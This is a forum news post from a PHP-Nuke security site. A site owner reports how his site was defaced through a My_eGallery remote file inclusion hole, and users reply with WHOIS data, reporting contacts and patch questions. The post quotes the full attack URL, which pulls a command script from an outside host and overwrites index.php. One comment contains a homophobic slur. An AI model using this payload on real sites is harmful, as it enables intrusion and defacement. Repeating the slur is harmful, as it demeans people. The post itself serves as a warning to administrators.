You are missing our premiere tool bar navigation system! Register and use it for FREE!

NukeCops  
•  Home •  Downloads •  Gallery •  Your Account •  Forums • 
Readme First
- Readme First! -

Read and follow the rules, otherwise your posts will be closed
Modules
· Home
· FAQ
· Buy a Theme
· Advertising
· AvantGo
· Bookmarks
· Columbia
· Community
· Donations
· Downloads
· Feedback
· Forums
· PHP-Nuke HOWTO
· Private Messages
· Search
· Statistics
· Stories Archive
· Submit News
· Surveys
· Theme Gallery
· Top
· Topics
· Your Account
Who's Online
There are currently, 439 guest(s) and 0 member(s) that are online.

You are Anonymous user. You can register for free by clicking here
1stmarinedivision.com Hacked!!
Securityhue writes "Hello all, just thought that I would make everyone aware that I was hacked last night ...Although no real damage was done this time, I guess I was lucky...The intruder came in on My_eGallery/public/displayCategory.php and then from there he was able to write to my index.php page! They left me a message saying," owned by hidden wrestle porra " .To those that are running the gallery make sure that you have all the correct patches out there so this don't happen to you!
As far as the code and such that was used.... they used the following
::::modules/My_eGallery/public/displayCategory.php?basepath=http://www.dunnmemorial.org/bb/cmd.txt?&cmd=cd%20/home/httpd/vhosts/1stmarinedivision.com/httpdocs;echo%20owned%20by%20hidden%20wrestle%20porra%20>%20index.php:::::::
Also, please make note of his Ip 200.221.163.230 and make sure to ban them !
........................Hue http://www.1stmarinedivision.com
1St. To Excel
1St. To Succeed
1St. Marine

Admin Note: Haven't checked this, but here is an exploit for my_egallery. A fix is also available via that link to: sourceforge."
Posted on Friday, December 12 @ 23:17:22 CET by Zhen-Xjell
 
Related Links
· Computer Cops
· More about Security
· News by Zhen-Xjell


Most read story about Security:
PHP-Nuke admin.php security hole - PATCHED

Article Rating
Average Score: 0
Votes: 0

Please take a second and vote for this article:

Excellent
Very Good
Good
Regular
Bad


Options

 Printer Friendly Page  Printer Friendly Page

 Send to a Friend  Send to a Friend

Threshold
The comments are owned by the poster. We aren't responsible for their content.

No Comments Allowed for Anonymous, please register

Re: 1stmarinedivision.com Hacked!! (Score: 1)
by allevon on Friday, December 12 @ 23:22:15 CET
(User Info | Send a Message) http://www.AlleVonTech.com
Oh Gee whiz Batman, whaddya know ANOTHER transexual homo from Brazilian. Resolves to:

canonical name 200-221-163-230.canbrasacesso.speeduol.com.br

domain: SPEEDUOL.COM.BR
owner: UOL BRASIL INTERNET LTDA
ownerid: 001.354.636/0001-02
responsible: Contato da Entidade UOL
address: Avenida Brigadeiro Faria Lima, 1.384, 10 andar
address: 01452-002 - Sao Paulo - SP
phone: (11) 3038-8431 []
owner-c: CAU12
admin-c: CAU12
tech-c: CTU6
billing-c: CCU10
nserver: ELIOT.UOL.COM.BR
nsstat: 20031212 AA
nslastaa: 20031212
nserver: BORGES.UOL.COM.BR
nsstat: 20031212 AA
nslastaa: 20031212
created: 19991111 #219866
changed: 20031202
status: published

nic-hdl-br: CAU12
person: Contato Administrativo - UOL
e-mail: l-registrobr-uol@CORP.UOL.COM.BR
address: Av. Brigadeiro Faria Lima, 1384, 5 andar
address: 01452-002 - Sao Paulo - SP
phone: (11) 3038-8431 []
created: 20031202
changed: 20031209

nic-hdl-br: CCU10
person: Contato de Cobranca - UOL
e-mail: l-adm-dns@CORP.UOL.COM.BR
address: Av. Brigadeiro Faria Lima, 1384, 5 andar
address: 01452-002 - Sao Paulo - SP
phone: (11) 3038-8431 []
created: 20031202
changed: 20031202

nic-hdl-br: CTU6
person: Contato Tecnico - UOL
e-mail: l-adm-dns@CORP.UOL.COM.BR
address: Av. Brigadeiro Faria Lima, 1384, 5 andar
address: 01452-002 - Sao Paulo - SP
phone: (11) 3038-8431 []
created: 20031202
changed: 20031202

remarks: Security issues should also be addressed to
remarks: nbso@nic.br, http://www.nbso.nic.br/
remarks: Mail abuse issues should also be addressed to
remarks: mail-abuse@nic.br


inetnum: 200.221.128/17
aut-num: AS15201
abuse-c: SEO50
owner: UOL BRASIL INTERNET LTDA
ownerid: 001.354.636/0001-02
responsible: Contato da Entidade UOL
address: Avenida Brigadeiro Faria Lima, 1.384, 10 andar
address: 01452-002 - Sao Paulo - SP
phone: (11) 3038-8431 []
owner-c: CAU12
tech-c: CAU12
inetrev: 200.221.128/17
nserver: ELIOT.UOL.COM.BR
nsstat: 20031209 AA
nslastaa: 20031209
nserver: BORGES.UOL.COM.BR
nsstat: 20031209 AA
nslastaa: 20031209
created: 20010706
changed: 20031202

nic-hdl-br: CAU12
person: Contato Administrativo - UOL
e-mail: l-registrobr-uol@CORP.UOL.COM.BR
address: Av. Brigadeiro Faria Lima, 1384, 5 andar
address: 01452-002 - Sao Paulo - SP
phone: (11) 3038-8431 []
created: 20031202
changed: 20031209

nic-hdl-br: SEO50
person: Security Office
e-mail: security@UOL.COM.BR
address: Av. Brigadeiro Faria Lima, 1384, 4 andar
address: 01452-002 - São Paulo - SP
phone: (11) 3038-9500 []
created: 20021114
changed: 20021120





Re: 1stmarinedivision.com Hacked!! (Score: 1)
by XEULAS (MotherPlucker@KentuckyFriedChicken.com) on Saturday, December 13 @ 00:12:32 CET
(User Info | Send a Message) http://www.SiteLance.com
Sheesh. Not another one. Here is the 'report hackers' fbi email addy

nipc.watch@fbi.gov

and the website with more info

http://www.cybercrime.gov/reporting.htm

----

Im spendin way too much time on banning hackers! Anyone have an automatic way to do it? (I have protector). Like a way to daily, -automatically-, import the nukecops IP ban list?




Re: 1stmarinedivision.com Hacked!! (Score: 1)
by Johan1982 on Saturday, December 13 @ 00:33:41 CET
(User Info | Send a Message)
Nukecops staff the fix in http://www.nukecops.com/postt15673.html in the last messages solve the problem?



Re: 1stmarinedivision.com Hacked!! (Score: 1)
by genoxide on Saturday, December 13 @ 05:43:22 CET
(User Info | Send a Message) http://www.projectxero.org
that fix is only for the postnuke my_egallery? isn't there a fix for the phpnuke one?


Powered by TOGETHER TEAM srl ITALY http://www.togetherteam.it - DONDELEO E-COMMERCE http://www.DonDeLeo.com - TUTTISU E-COMMERCE http://www.tuttisu.it
Web site engine's code is Copyright © 2002 by PHP-Nuke. All Rights Reserved. PHP-Nuke is Free Software released under the GNU/GPL license.
Page Generation: 0.135 Seconds - 178 pages served in past 5 minutes. Nuke Cops Founded by Paul Laudanski (Zhen-Xjell)
:: FI Theme :: PHP-Nuke theme by coldblooded (www.nukemods.com) ::